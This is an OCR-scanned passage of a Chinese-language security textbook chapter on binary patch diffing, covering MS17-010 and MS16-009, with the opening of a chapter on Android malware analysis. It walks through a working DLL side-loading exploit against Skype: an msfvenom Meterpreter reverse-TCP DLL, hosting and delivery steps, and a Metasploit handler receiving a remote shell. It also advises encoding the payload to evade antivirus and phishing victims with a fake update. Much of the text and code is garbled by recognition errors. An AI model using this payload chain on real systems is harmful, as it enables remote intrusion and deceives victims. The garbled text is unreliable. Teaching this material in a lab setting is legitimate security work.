近 30 天 内 修改 过 的 文件 标记 为 “ 感 兴 趣 的 文件 ”原因 在 于 ， 和 累积 更 新 包含 与 相应 
Windows 版 本 相关 的 所 有 更 新 (会 一 直 退 济 到 数 月 前 )。PatchClean 将 30 天 前 的 所 有 文 
件 放 入 Old 文 件 夹 , 使 你 能 集中 精力 处 理 最 近 更 新 的 文件 。 不过, 你 仍 需 要 对 此 进行 
验证 ， 并 了 解 执行 提取 的 日 期 。 如 果 在 初始 补丁 发 布 日 期 之 后 执行 提取 并 运行 
PatchClean， 那 么 可 能 需要 相应 地 调整 日 期 和 时 间 。 

在 下 面 的 命令 示例 中 ， 使 用 管理 员 屿 份 在 命令 提示 人 符 中 运行 PatchExtract， 从 
March 2017 累 积 更 新 中 提取 文件 和 补丁 : 
c:\grayhat\Chapter 17» powershell -ExecutionPolicy Bypass 
PS C:\grayhat\Chapter 17» .\PatchExtract13.psl1 -Patch . 
\March-2017-Win10-x86-Cumulative-Update\AMD64 X86-all-windows10.0-kb4 
012606-x86 8cl9e23def2ff92919d3fac069619e4a8e8d3492e.msu -Path 
‘C:\grayhat\Chapter 17V March-2017-Winl0-x86-Cumulative-Update' 

该 命令 看 上 去 很 长 ， 但 这 主要 是 因为 输入 的 路 径 名 以 及 累积 mE pinos 

成 的 。 Pe 命令 后 ，PatchExtract 将 执行 提取 ， 具 体 取决 于 文件 大 小 ， 能 需要 几 
分 钟 的 时 间 。Windows 10 x64 累 积 更 新 的 大 小 可 能 超过 1GB， Slat 
本 。 人 完成 后 ， 将 看 到 几 个 文件 夹 。 在 本 例 中 ， 进 入 x86 文 件 夹 看 一 下 。 有 1165 个 子 文 
件 夹 ; 需要 思考 一 下 我 们 的 目标 。 我 们 只 想 识别 与 March 2017 补 丁 周 期 相关 的 文件 。 
此 时 PatchClean 工 具有 了 用 武之 地 。 首 先 要 进入 文件 光 ， 将 用 于 分 析 的 系统 日 期 改 
为 2017 年 3 月 的 “星期 二 补丁 ”日 期 ， 即 3 月 14 日 。 默 认 情 况 下 ，PatchClean 从 这 个 
日 期 回 退 30 天 , 将 超出 修改 时 间 的 内 容 部 归 入 Old 文 件 夹 。 这 允许 我 们 了 解 在 最 近 30 
天 内 哪些 文件 发 生 了 变化 。 

c:\grayhat\Chapter 17» powershell -ExecutionPolicy Bypass 

PS C:\grayhat\Chapter 17> .MPatchClean.ps1 -Path ‘C:\grayhat\Chapter 

17N March-2017-Win10-x86-Cumulative-Update\x86’ 

完成 脚本 后 ， 原 来 的 1165 个 文件 夹 只 剩 下 318 个 。 这 个 数量 是 正常 的 ， 因 为 延迟 
修复 SMB 汤 洞 ， 铸 软 跳 过 了 2017 年 2 月 的 “星期 二 补丁 ”。 


17.3.3 ”实验 17-2: 比较 MS17-010 
本 实验 将 使 用 Gray Hat 和 存储 库 中 的 两 个 srv.sys 文 件 。 一 个 位 于 Old 文 件 来 ， 男 一 
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个 位 于 New 文 件 来。 新 文件 取 目 March 2017 更 新 。 本 实验 中 的 示例 来 目 IDA 7.0(x86 
兼容 模式 )， 以 便 使 用 BinDiff 4.3 插 件 。 

站 和 完 打 开 授 权 的 IDA 副 本， 如 果 没 有 授权 版 本 ， 则 使 用 免 弗 的 5.0 版 本 。 接 看 打 
开 新 版 本 的 srv.sys 文 件 。 人 允许 IDA 完 成 分 析 。 此 后 , 保存 数据 库 , 打开 旧版 本 的 srv.sys。 
完成 分 析 后 ， 就 可 以 执行 比较 了 。 如 图 17-13 所 示 ， 加 载 Old 厂 srvsys 后 ， 按 下 Ctrl+6 
1I JFBinDiff3z f, ZAJa Diff Database 按 钮 。 如 果 正 在 使 用 turbodiff， 则 按 下 
Ctrl+F11 组 合 键 打开 有 集 单 ， 然 后 使 用 实验 17-1 中 显示 的 方法 。 

里 击 Diff Database 按 钮 后 ， 导 航 到 新 版 本 的 srv.sys DBF, WT. Fä 
后 ， 完 成 比较 ， 你 将 看 到 IDA 中 打开 了 一 些 新 的 选项 卡 。 我 们 感 兴趣 的 是 Matched 
Functions。 在 图 17-14 显 示 的 结果 中 ， 选 择 函 数 SrvSmbTransaction()。 退 第 而 言 ， 如 
果 有 多 个 图 数 包含 更 改 ， 在 确定 可 能 感 兴 趣 的 函数 时 ， 必 须 丛 看 函数 名 。 


Similarity Confid Change EA Primary Name Primary 
® BinDiff 43.0 x 97 --- 000000000005C141  SrvSnapParseTok 


Load Results... 0.99  GI-JE-- 0000000000057C84  SrvSmbTransaction(x) 


| Close Help 


图 17-13” 单 击 Diff Database 按 钮 图 17-14 选择 函数 SrvSmbTransaction0 


按 下 CtrlHE 组 合 键 执行 图 形 比较 。 如 果 正 在 使 用 turbodiff， 务 必 使 用 前 述 方法 执 
行 图 形 比 较 。 图 17-15 是 图 形 比 较 的 缩 版 概览 
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如 有 果 单 击 任何 汇编 代码 块 ， 而 非 直 接 放 大 ， 屏 幕 将 更 改 配置 ， 只 显示 所 选 块 劳 
边 的 组 。 如 果 想 要 回 到 总 概 完 图 ， 则 必须 日 击 BinDiff 主 功能 区 中 的 Select Ancestors 


图 标 ， 如 图 17-16 所 示 。 
ARAK K Gi 


TERRAN 


单 击 
图 17-16  "&itiSelect Ancestors 图 标 


在 本 例 中 ， 未 打 补 丁 的 srv.sys 版 本 位 于 左 侧 ， 己 打 补 丁 的 版 本 位 于 右 侧 。 放 大 


后 观看 区 别 ， 会 发 现 一 个 有 趣 的 更 改 。 图 17-17 是 未 打 补 丁 的 版 本 ， 可 看 到 以 所 示 方 
式 调 用 f ExecuteTransaction pK 2 . 


00057CB4 SrvSmbTransaction (x) 

000584B5 i ss:[ebrptÜxFFFFFFFE], Ox 
00058459 mov eax, ss:[ebptOxFFFFFFFB8] 
Q000584BC mov ecx, ssr:[ebptÜxFFFFFFE4] 
Q00584BF mov ds:[eaxt+0x58], ECx 

000584C2 mov eax, so: [ebptOxFFFFFFFS] 
000584C5 mov ecx, ss:[ebptÜxFFFFFFCC] 
000584C8 mov da:[e&àxtÜx64], Cx 


000584CB j 0x58 4E4 


00057CB84 SrvSmbTransaction (x) | 00057C84 SrvSmbTransaction (x) 
000584E4 mov eax, ds:[ WPP GLOBAL Control] 000584CD me eax, $6: (ebp+O0xFFFFFFFS | | 
000584E9 cmp ds: [eax*Üx1D], 0x2 000584D0 ecx, esi ffi 
OO0584ED j5 0x5851D 000584D2 j ds:[esitÜüxA0], eax 

000584D8 BExecuteTransaction(i4 

000584DD abk, eax 

000584DF imp Ox585F9 | 


图 17-17 ”调用 ExecuteTransaction 国 数 


现在 看 打 补 丁 后 的 版 本。 导致 调用 ExecuteTransaction 函 数 的 同一 代码 块 首 先 调 
HimemsetrA Zi, "4nE7-18Przn« 

INTE, (un EPA rz EUG $l[ExecuteTransactionER žr, (AFT Vt 201 cA 
过 memset 函 数 调 用 后 ， 才 击 中 相应 的 块 。 尽 可 以 跟踪 该 路 径 中 的 多 个 块 。memset 
函数 调用 负责 处 理 与 CVE-2017-0147 相 关 的 信息 泄露 。 
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i ee ee ee ee ee ee ee ee ee: 
Ee eae EEE EE EE EE EE EE —— —-—— Å å ae 


117-18 ”调用 memset 函 数 


17.4 通过 比较 补丁 进行 漏 凋 攻击 


前 面 用 MS17-010 进 行 漏洞 比较 , 我 们 找到 了 用 于 解决 信息 泄露 问题 的 代码 变化 
之 处 ， 但 这 并 未 导致 我 们 针对 这 个 漏洞 发 起 攻击 。 下 面 的 例子 将 分 析 一 个 DLL 和 劳 路 
漏洞 (DLL Side-Loading Bug)， 它 允许 远程 执行 代码 ， 并 运行 一 个 漏洞 攻击 程序 。 
MS16-009 和 MS16-014 都 声称 消除 了 CVE-2016-0041， 而 CVE-2016-0041 与 “DLL 加 
载 远程 代码 执行 漏洞 ”相关 。 漏 洞 攻 击 程序 的 作者 发 现 ， 我 们 感 兴趣 的 实际 文件 可 
通过 MS16-009 补 丁 获得 。 前 面 介 绍 的 PatchExtract 工 具 的 作者 是 Greg Linares， 这 个 
漏洞 也 是 由 Greg Linares 发 现 的 。 


17.4.1 DLL 旁 路 漏洞 


从 网 上 查找 资料 ， 会 得 到 有 关 DIL 旁 路 漏洞 的 不 同 定义 。 概 括 来 讲 ， 可 能 有 一 
种 或 多 种 方法 强制 加 载 多 余 的 DLL。 这 具体 取决 于 注册 表 的 设置 ， 以 及 传递 给 DLL 
加 载 函 数 (如 LoadLibrary0 函 数组 ) 的 参数 。 下 面 用 一 个 简单 类 比 来 描述 此 类 问题 。 假 
设 你 总 将 食盐 和 妆 椒 放 在 橱柜 里 的 一 个 特殊 位 置 。 下 次 使 用 它们 时 ， 它 们 正好 不 在 
指定 的 位 置 。 你 可 能 放弃 使 用 食盐 和 妆 概 ， 或 可 能 从 其 他 位 置 (如 其 他 橱柜 、 果 子 和 
柜台 ) 找 寻 。 最 终 ， 要 么 找到 食盐 和 衣 概 ， 要 么 罢 手 。 这 与 DLL 加 载 中 使 用 的 搜索 顺 
序 差 别 不 大 。 一 个 更 安全 的 设置 是 只 人 允许 从 特定 位 置 (如 C:NWindows\System32N 加 
载 所 需 的 DLL。 一 个 安全 性 较 关 的 选择 是 允许 基于 搜索 优先 顺序 ， 从 不 同位 置 加 
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DLL. 

下 面 再 详细 分 析 从 何 处 加 载 DLL， 以 及 如 何 加 载 DLL。 表 和 匈 ， 前 儿 个 Windows 
版 本 都 有 一 个 注册 表 编 辑 占 ， 该 编辑 央 通 单位 于 HKEY LOCAL MACHINESYSTEM 
CurrentControlSet\Control\Session ManagerKnownDLLs\， 如 图 17-19 所 示 。 


BW Registry Editor = [] X 
Elle Edit View Favorites Help 
ComputenHKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs 


~ | DOS Devices ^|| Name Type Data 2 
~ Environment ab) |MAGEHLP REG_SZ IMAGEHLP.dil 

© Executive ab) IMM32 REG_SZ IMM32.dll 
Pad ss rileRenameOr — | lad)kemel32 REG_SZ kernel32 dll | 
EN i — a] MSCTF REG SZ MSCTF dii | 
hz ab) MSVCRT REG_SZ MSVCRT.dll | 
> Memory Mana Y || 28)NORMALIZ REG SZ NORMAUZdl | 

< > < > 


图 17-19 ”注册 表 编 辑 器 


该 编辑 器 存储 的 DLL 通常 有 助 于 快速 加 载 程序 ， 但 也 有 人 将 其 看 作 一 个 安全 控 
件 ， 因 为 它 指定 只 能 从 C:VWindows\System3 和 \ 或 C\Windows\SysWOW64\ 加 载 列 出 的 
DLL。 此 后 ，LoadLibraryEX 函 数 可 用 于 动态 加 载 进程 请 求 的 DLL: 


HMODULE WINAPI LoadLibraryEx ( 


In LPCTSTR lpFileName, 
Reserved HANDLE hFile, 
In DWORD dwFlags 


i; 


一 个 所 需 的 参数 是 dwFlags，dwFlags 用 于 指定 可 从 何 处 加 载 DLL， 还 指定 了 与 
AppLocker 相 关 的 行为 , 以 及 在 代码 执行 入 口 会 发 生 什 么 。 可 从 https://msdn.microsoft. 
comyen-us/library/windows/desktopmms684179(v=vs.8$).aspx 找 到 更 多 人 信息。 如 果 
dwFlags 参 数 使 用 默认 值 0， 将 表现 出 旧式 LoadLibrary 函 数 的 行为 ， 该 函数 实现 了 
SafeDllSearchMode， 人 微软 给 出 的 描述 如 下 。 

如 果 局 用 SafeDllSearchMode， 将 按 如 下 顺序 进行 搜索 : 

(1) 应 用 程序 加 载 文 件 夹 。 

(2) 系统 文件 光 。 用 GetSystemDirectory 图 数 获 取 访 文件 夹 的 路 径 。 

(3) 16 位 系统 文件 严 。 无 法 便 用 函数 获得 该 路 径 ， 但 可 以 搜索 到 该 文件 炎 。 

(4) Windows 文 件 光 。 使 用 GetWindowsDirectory 国 数 获取 该 文件 严 的 路 径 。 

(5) 当前 文件 兴 。 

(6) PATH 环境 变量 中 列 出 的 文件 夹 。 
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注意 ， 这 不 包括 App Paths 注 册 表 项 为 每 个 应 用 程序 指定 的 路 径 。 在 计算 DLL 搜 
索 路 径 时 ， 不 使 用 App Paths 注 册 表 项 。 
这 些 选 项 中 ， 第 (5) 项 和 第 (6) 项 可 能 包含 会 受到 攻击 者 影响 的 位 置 ， 如 
world-writable 位 置 。 用 于 保护 LoadLibraryEX 调 用 的 常见 dwFlags 选 项 是 0x800 
“LOAD LIBRARY SEARCH SYSTEM32 ”。 该 选项 将 DLL 加载 范 围 限制 为 
System32 文 件 夹 。 


17.4.2 ”实验 17-3: 比较 MS16-009 


本 实验 分 析 与 MS16-009 和 MS16-014 相 天 的 安全 修复 ,，MS16-009 和 MS16-014 都 
用 于 解决 CVE-2016-0041。 补 丁 提 取 过 程 已 经 结束 了 ， 可 从 Gray Hat Hacking 代 码 库 
获得 相关 代码 。 显 示 的 补丁 比较 示例 使 用 了 IDA 7.0 x64 和 BinDiff 4.3。 漏 洞 攻 击 程 
序 段 涉 及 的 操作 系统 是 Kali Linux x64 和 Windows 10 x64 Home Edition， 版 本 与 为 
10586. Windows 10 基 本 版 使 用 的 Skype 版 本 是 7.18.0.112。 

提取 MS16-009 和 补丁 时 ， 确 定 已 经 更 新 了 urlimon.dll 文 件 。 本 实验 为 你 提供 了 
urlmon.dll 的 更 新 版 本 和 旧版 本 。 第 一 步 是 使 用 IDA 进 行 反 汇编 ， 执 行 比较 。 必 须 使 
用 inDiff 4.3 和 IDA Professional， 因 为 此 缺陷 只 影响 64 位 的 Windows 探 作 系 统 ， 而 这 
两 个 软件 支持 反 汇 编 64 位 的 输入 文件 。 如 果 无 法 反 汇 编 64 位 的 输入 文件 并 保存 
IDA .idb 数 据 库 文件 ,那么 在 阅读 下 面 的 内 容 时 ， 将 无 法 完成 本 实验 。 你 可 能 还 需要 
RIDA H 4 V inradare2. 

使 用 其 中 一 个 选项 执行 比较 。 图 17-20 显 示 了 使 用 BinDiff 时 的 结果 。 


Similarity Confid Change EA Primary Name Primary 
| -|----- 000000018003B2A0 : BuildUserAgentStringMobileHelper(UACOMPAT MODE, char ... 


图 17-20 ”使 用 BinDiff 时 的 结果 


我 们 按照 BinDi 企 只 更 改 了 一 个 函数 。 可 直接 导 问 与 缺陷 修复 相关 的 函数 ， 这 给 
RITER y HE. KAA T BuildUserAgentStringMobileHelperO; 1Z FCtrI+ EXPT 
图 形 比较 。 图 17-21 概 括 显示 了 结果 。 

放大 代码 变化 部 分 ， 可 快速 找到 图 17-22 所 示 的 代码 块 。 
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图 17-21 总体 结果 


图 17-22 快速 找到 代码 块 


一 眼 束 能 看 出 ， 在 左 侧 的 未 打 和 补丁 版 本 中 ，dwFlags 参 数 的 寞 或 运 拭 结果 是 0， 
这 样 , SafeDllSearchMode 将 生效 ,在 右 侧 的 已 打 和 补丁 版 本 中 ,将 dwFlags 设 置 为 0x800， 
这 会 将 所 需 DLL 的 加 载 范 围 限制 为 System32 文 件 夹 。 我 们 想 要 确定 在 代码 的 这 个 位 
置 加 载 了 哪个 DLL。 为 此 ， 返 回 IDA， 跳 到 函数 BuildUserAgentStringeMobileHelper 
处 。 快速 到 达 那 里 的 最 简便 方式 是 单 击 IDA 中 的 函数 窗口 , 然后 开始 输入 所 需 的 函 
数 名 。 此 后 双击 ， 打 开 反 汇编 代码 。 可 跳 过 这 个 步骤 ,方法 是 在 IDA 主 反 汇 编 窗 口 
中 单 击 ， 按 下 G 键 ， 输 入 要 跳 转 到 的 地 址 。 返 回 分 析 BinDift 中 未 打 补 丁 时 的 结果 ， 
发 现 感 兴趣 的 地 址 是 0x18003BCB1。 跳 转 到 该 地 址 后 ， 将 获得 所 需 结 果 ， 如 图 17-23 
所 示 。 

可 以 看 到 ， 代 码 在 此 处 加 载 的 DLL 是 phoneinfo.dll。 可 跳 过 以 下 步 又， 但 目标 是 
确定 哪些 应 用 程序 需要 这 个 DLL 。 首 先 从 根 文件 系统 执行 全 部 搜索 ， 看 一 下 
phoneinfo.dl! 文 件 是 侣 安装 在 Windows 10 x64 上 。 确 认 访 文件 并 不 存在 。 接 下 来 想 要 
Jaz Process Monitor 工 具 ( 可 从 https:Wdocs.Imicrosoft.comyen-us/sysinternals/downloads/ 
procmon 获 取 )。 图 17-24 显 示 启 动 Process Monitor 工 具 后 为 其 应 用 了 两 个 过 滤器 。 


第 17 章 下 一 代 补 丁 漏洞 攻击 


réd, r8d ; dwFlags : 
rcx, LibFileName ; "phoneinfo.dll^ 
edx, edx ; hFile 

cs: imp LoadLibraruExli 

rax, rax 


loc, 18003BD8B 


rdx, ProcName "QueruPhoneInformation" 
rcx, rax : hModule 

cs: imp GetProcAHddress 

cs:quord 180148088, rax 

rsi, rax 

rax, rax 

short loc 18003BCF3 


图 17-23 aka But 


E` Process Monitor Filter X 


Display entries matching these conditions: 


wma ve [SSS di nde E 
a 


| Reset | Remove 


如 果 Result 是 NAME NOT FOUND， 
Path， 将 ends with 设置 为 phoneinfo.dll。 应 用 这 些 过 滤 需 后 ， 可 运 
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.. I&IEXPLORE.EXE 
EXIEXPLORE.EXE 
0... &IEXPLORE.EXE 
0... &IEXPLORE.EXE 
; = |EXPLORE.EXE 
‘0... GIEXPLORE.EXE 
35:2... tj Skype.exe 
35:2... t3 Slope cue 
35:2... Ey 5kype.exe 

‘2... Wj5kype.exe 
352 € Skype exe 
352... X -— 


Value 
NAME NOT FOUND 


[17-24 ”局 动 Process Monitor 工 有 具 后 为 其 应 用 了 两 个 过 滤器 


4880 paree 


图 17-25 是 一 个 示例 结果 。 


C:\Program Files*intemet Explorer'phoneinfo dll 
C:\Windows \Sys WOW 64\phoneinfo dll 

C:\Windows \phoneinto dll 

C^Windows*Sys WOW/64\wbem ‘\phoneinto dll 
C:\Windows \\Sys WOW 64\ WindowsPowerShell\w 1.0*phoneinfo dil 
C:\Python27\phoneinfo -dll 

C:\Program Files $6)\Skype\\Phone phoneinfo dll 

C:\Program Files (x85) Skype Phone phoneinfo dll 
C:\Windows Sys WOW 64\phoneinto .dl 
C:\Windows \System ‘\phoneinfo dll 

C:\Windows ‘phoneinfo dll 

C:\Windows Sys WOW64\phoneinfo dll 

C:\Windows \phoneinfo .dl 
C:\Windows'\Sys WOW 64\wbem ‘\phoneinfo dll 
C:\Windows \Sys WOW 64\WindowsPowerShell\w 1.0\phoneinfo.dil 
CAPython2 7" phoneirfo.dll 

C:\Program Files (x86) Skype Phone phoneirfo dll 


图 17-25 一 个 示例 结果 


则 第 一 个 过 滤器 生效 。 第 二 个 过 滤器 用 于 


去 行 不 同 的 应 用 程序 ， 
如 IE11、Edse、Skype、OneDrive 和 Word 等 。 由 于 将 DLL 命名 为 phoneinfo.dll， 最 好 


NAME NOT FOU 


NAME NOT FOUN 


NAME NOT FOUN 
NAME NOT FOU 
NAME NOT FOU 
NAME NOT FOU 
NAME NOT FOU 


NAME NOT FOU 


NAME NOT FOU 
NAME NOT FOU 
NAME NOT FOU! 
NAME NOT FOU 


ND Desired Access: H... 
D Desired Access: R... 
D Desired Access: A... 
— =< R... 


NAME NOT FOUND Desi 


NAME NOT FOU 


NAME NOT FOU 


NAME NOT FOU 


NAME NOT FOU 


ND Desired Access: R... 
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jer Internet Explorer 和 Skype 都 尝试 加 载 DLL。 可 从 右 侧 看 到 检查 的 所 有 
BUR, 这 是 SafeDllSearchMode 的 行为 。 尤 其 可 以 看 到 ，Ci\Python2 孜 是 被 检查 的 位 置 
—. i 果 将 Meterpreter 用 作 载 和 荷 ， 通 过 msfvenom 创 建 恶 意 DLL， 将 能 与 存在 漏洞 
的 Windows 10 系 统 进 行 远程 会 话 。 图 17-26 显 示 创 建 了 恶意 文件 phoneinfo.dll， 其 中 
包含 连接 到 Kali Linux 系 统 的 Meterpreter 载 何 。 此 后 ， 将 Python SimpleHTTPServerft 
块 用 作 有 党 害 系 统 的 恶意 DLL 。 疝 未 应 用 任何 次 型 的 AV( 反 病毒 ) 规 避 编 码 、.ghostwriting 
等 技术 ， 因 此 禁用 Windows Defender 来 测试 这 个 漏 铀 攻击 程序 。 


bd 


rootükali:-4£ msfvenom -p windows/meterpreter/reverse tcp LHOST=10.10.55.55 LPORT=4444 -f dll > phoneinfo.dll 
rootükali:-4 file phoneinfo.dll 
phoneinfo.dll: PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows 


root@kali:~# python -m SimpleHTTPServer 8080 
Serving HTTP on 0.0.0.0 port 8080 ... 


图 17-26 ”创建 恶意 文件 phoneinfo.dll 


接 下 来 ， 如 果 攻 击 成 功 ， 局 动 Metasploit 侦 听 器 来 接收 传 入 的 连接 ， 如 图 17-27 
PIS 


msf » use exploit/multi/handler 
msf exploit(handler) > set LHOST 0.0.0.0 

LHOST => 0.0.0.0 

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse tcp 
PAYLOAD => windows/meterpreter/reverse tcp 

msf exploit(handler) > set LPORT 4444 

LPORT => 4444 


mst exploit(handler) > exploit 


[*] Started reverse handler on 0.0.0.0:4444 
[*] Starting the —— handler. 


在 Python 和 Metasploit 侦 听 喜 运行 时 , 导航 到 Windows 系 统 , 使 用 Internet Explorer 
连接 到 Kali 系 统 的 端口 8080。 此 后 下 载 phoneinfo.dl! 文 件 ， 并 保存 到 C:Python2 和 ， 如 
图 17-28 所 示 。 


6 £ mtp 710,10,55.55 8080 pD-d 


^ F * Thi PC * Local Disk (C:] $ Pythona? > 


© Desktopi = 
» kev key txt Organize ™ Mew Folder dss D? 
* phonemfo.dil + 2^ Music di Mame Date modified Type Size 
* voll-metal£1532 raw Me 
。 voll-mcta9225 jpe dicli PEIE 2/20/2016 1:41 PM File Folder 
> B Videos [| Dec 2/20/2016 1:41PM File Folder 
w Ss Local Disk (C) Im include 2/20/2016 1:41 PM File Folder 
|. Pedlags [1 Lib 2/20/2016 1:41 PM File folder 
» B Program Fits [E libs 2/20/2016 1:41 PM — File folder 
E | | tel 2/20/2016 1:41PM File folder 
+ F| Program Files | 
|| Tools "20/2016 1:41 PM File Folder 
» |. Python27 
|. RSAC2015 
[a symbols 
: p Users 


, [4 Windows 
c» Network 


File name; [ES oneinfa 


ication extension 


A Hide Folders Cancel 


图 17-28 “下载 文件 并 保存 
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接 下 来 局 动 Skype， 按 照 SafeDllSearchMode 的 要 求 从 CA\Python2 人 入 文件 夹 加 载 恶 
意 DLL， 如 图 17-29 所 示 。 


Skype 
Skype Tools Help 


图 17-29 加载 恶 意 DLL 


运行 Skype 应 用 程序 时 ， 切 换 回 Kali Linux， 看 一 下 是 合 建 立 了 Meterpreter 会 话 ， 
如 图 17-30 所 示 。 


started reverse handler on 0.0.0.0:4444 

Starting the payload handler... 

Sending stage (752128 bytes) to 10.10.13.13 

Meterpreter session 1 opened (10.10.55.55:4444 -> 10.10.13.13:49681) at 2017-11-02 13:05:43 -0400 


meterpreter > shell 

Process 1604 created. 

Channel 1 created. 

Microsoft Windows [Version 10.8.10586] 

(c) 2015 Microsoft Corporation. ALL rights reserved. 


C:\Program Files (x86) \Skype\Phone> 
图 17-30 ”切换 回 Kali Linux 


大 功 告 成 ! 如 果 想 在 任意 环境 中 执行 此 操作 ， 则 需要 考虑 多 个 因素 。 首 先 ， 要 
对 载荷 进行 编码 ， 以 绕 过 防 病毒 检测 。 其 次 ， 要 设法 诱 使 受害 人 将 恶意 DLL 下 载 到 
系统 中 的 一 个 特定 位 置 。 这 可 以 通过 钓鱼 诈骗 实现 。 诱 骗 受害 人 ， 使 其 误 认 为 有 一 
个 重要 的 Skype 更 新 ， 需 要 将 这 个 恶意 DLL 保存 到 一 个 特定 位 置 。 
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17.5 本草 小 结 


本 章 介 绍 了 二 进 制 比 较 技 术 以 及 各 种 可 帮助 加 速 分 析 的 工具 。 我 们 列举 了 一 个 
简单 的 应 用 程序 概念 验证 示例 ， 随 后 查看 了 一 个 可 定位 漏洞 并 能 验证 假设 的 真实 补 
丁 。 这 种 后 天 学 会 的 技能 与 你 在 调试 和 阅读 反 汇 编 代码 方面 的 经 验 窗 不 可 分 。 这 类 
实践 经 验 积 累 得 越 多 ， 识 别 代 码 改 动 和 找 出 潜在 漏洞 的 能 力也 就 越 强 。 微 软 如 今 已 
经 不 再 对 Windows XPH Windows Vista 系 统 提 供 技术 文 持 ， 但 仍 有 一 些 像 Windows 
XP Embedded 之 类 的 版 本 在 继续 获得 文 持 并 接收 补丁 。 这 可 能 提供 了 在 一 个 精简 的 
系统 中 继续 分 析 补 丁 的 机 会 。 就 微软 而 言 ， 悄 无 声 奶 地 提供 补丁 的 行为 并 不 少见 。 
有 时 补丁 在 Windows 不 同 版 本 之 间 有 所 差异 ， 但 与 比较 不 同 版 本 的 Windows 补 丁 相 
比 ， 比 较 同 一 个 版 本 的 补丁 可 能 会 获得 更 多 信息 。 
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智能 手机 已 取代 传统 的 “移动 电话 ” 成 为 一 种 全 能 型 袖珍 个 人 计算 机 和 多 巡 体 
电子 设备 。 这 些 个 人 设备 为 用 尸 的 生活 打开 了 一 局 多 姿 多 彩 的 贸 口 。 包 含 用 户 日 程 
安排 的 日 历 、 存 有 各 种 联系 方式 的 电话 每、 社交 媒体 账户 以 及 银行 应 用 等 仅 是 现代 
和 典 垄 智能 手机 的 部 分 功能 子 集 。 恶 意 软 件 作者 早已 涉足 这 一 回报 丰厚 的 平台 ， 并 以 
各 种 方式 对 其 进行 漏洞 攻击 。 了 解 移动 设备 的 染 构 以 及 应 用 分 析 拉 术 ， 使 用 尸 能 够 
判断 应 用 是 不 是 以 一 种 非 恶 意 的 方式 在 访问 他 们 的 私人 数据 。 

本 章 提 供 的 分 析 方 法 和 工具 可 用 来 确定 移动 应 用 程序 的 功能 以 及 是 否 存在 恶意 
行为 。 


本 草 将 讨论 以 下 内 容 : 
e Android 和 iOS 平 台 的 工作 原理 
e 恶意 软件 的 静态 和 动态 分 析 方 法 


18.1 Android 平 台 简介 


在 开始 恶意 软件 分 析 之 前 ， 有 必要 先 熟 悉 Android 平 台 。 从 分 析 的 角度 看 ， 可 能 
我 们 最 关注 的 是 应 用 程序 是 如 何 工 作 的 。 接 下 来 将 阐述 Android 应 用 程序 包 (Android 
Application Package，APK)、 重 要 的 配置 文件 (如 AndroidManifesstxmD 以 及 在 Dalvik 
虚拟 机 中 运行 的 可 执行 文件 格式 DEX。 


18.1.1 Android 应 用 程序 包 


APK 是 一 种 在 Android 系 统 上 发 布 应 用 的 归档 文件 格式 。 它 打包 了 应 用 程序 需要 
的 所 有 文件 ， 这 样 可 以 很 方便 地 将 应 用 程序 作为 单个 文件 进行 处 理 或 移动 。 该 归档 
文件 使 用 的 是 应 用 最 广泛 的 ZIP 文 件 格式 ， 非 钊 关 似 于 同样 使 用 ZIP 格 式 的 JAR。 

于 APK 文 件 只 是 具有 不 同 扩展 名 的 ZIP 归 档 文 件 ， 因 此 无 法 将 其 与 其 他 ZIP 归 
档 文 件 区 分 开 来 。“ 魔 法 字 节 ”是 通 币 位 于 文件 开头 的 一 个 字 节 序列 ， 可 用 来 标识 一 
种 特定 文件 格式 。 在 Linux 上， 可 使 用 file 命 令 来 确定 文件 类 型 。 以 下 是 对 一 个 APK 
文件 运行 file 命 令 的 输出 结果 : 


$ md5sum demo.apk 
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9643084898a5547d4644aa7a9f2b8cO0d demo.apk 
$ file demo.apk 
demo.apk: Zip archive data, at least v2.0 to extract 


不 出 所 料 ， 显 示 的 类 型 是 Z 了 归档 文件 。 以 下 命令 输出 了 该 ZP 文 件 格式 的 魔法 


4 
zi 


$ hexdump -C -n 4 demo.apk 
00000000 50 4b 03 04 | PK. . | 


最 前 和 面 的 两 个 他 市 是 可 打印 字符 PK， 代 表 ZIP 文 件 格 式 发 明 者 Phil Katz 的 首 字 
母 缩写 ， 随 后 是 两 个 额外 的 字 节 : 03 04。 要 检查 一 个 APK 归 档 文 件 的 具体 内 容 ， 可 
用 文 持 ZIP 格 式 的 任意 工具 将 其 解压 缩 。 下 面 便 是 条 个 APK 归 档 文 件 解压 后 的 内 容 : 

$ unzip demo.apk -d demo 

Archive: demo.apk 

inflating: demo/res/layout/activity main.xml 
inflating: demo/res/menu/main.xml 
extracting: demo/res/raw/al.mp3 

extracting: demo/res/raw/a2.mp3 

inflating: demo/AndroidManifest.xml 
extracting: demo/resources.arsc 

extracting: demo/res/drawable-hdpi/back.jpg 


extracting: demo/res/drawable-xxhdpi/ic launcher.png 
inflating: demo/classes.dex 
inflating: demo/jsr305 annotations/Jsr305 annotations.gwt.xml 
inflating: demo/jsr305 annotations/vO0 r47/VO r47.gwt.xml 
inflating: demo/META-INF/MANIFEST.MF 
inflating: demo/META-INF/CERT.SF 
inflating: demo/META-INF/CERT.RSA 
这 里 显示 了 一 个 相对 简单 的 APKE 归档 文件 的 通用 结构 。 根 据 APKE 头 型 和 内 容 的 
不 同 ， 可 能 包含 各 种 文件 和 资源 ， 但 单一 的 APK 归 档 文 件 在 Android 2.2 及 更 低 版 本 
上 最 大 为 50MB， 在 Android 2.3 及 更 高 版 本 上 最 大 为 100MB。 


注意 : 一 个 APK 文 件 最 大 为 100MB， 但 它 可 有 两 个 额外 的 扩展 文件 ， 每 个 
最 高 可 达 2GB。 这 些 额外 的 扩展 文件 也 可 以 托管 在 Android Market( 2-4} 
场 ) 上 。 扩 展 文 件 增 加 了 APK 应 用 的 大 小 ， 所 以 在 安 草 市 场 上 看 到 的 应 用 大 
小 其 实 是 APK 本 身 加 上 扩展 文件 两 者 之 和 。 


下 面 简单 介绍 APK 目 录 结 构 和 常用 文件 : 

e AndroidManifestxml 有 所 有 APK 的 根 目 录 下 均 舍 有 此 文件 。 它 包含 了 在 
Android 上 运行 所 需 的 应 用 程序 信息 ， 稍 后 将 对 其 进行 详细 介绍 。 

e META_INF 该 目录 包含 了 许多 与 APK 元 数据 相关 的 文件 ， 如 证 书 或 清单 
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文件 。 

¢ CERT.RSA 应 用 程序 的 证 书 文件 。 这 里 是 一 个 RSA 证 书 ， 但 也 可 以 是 
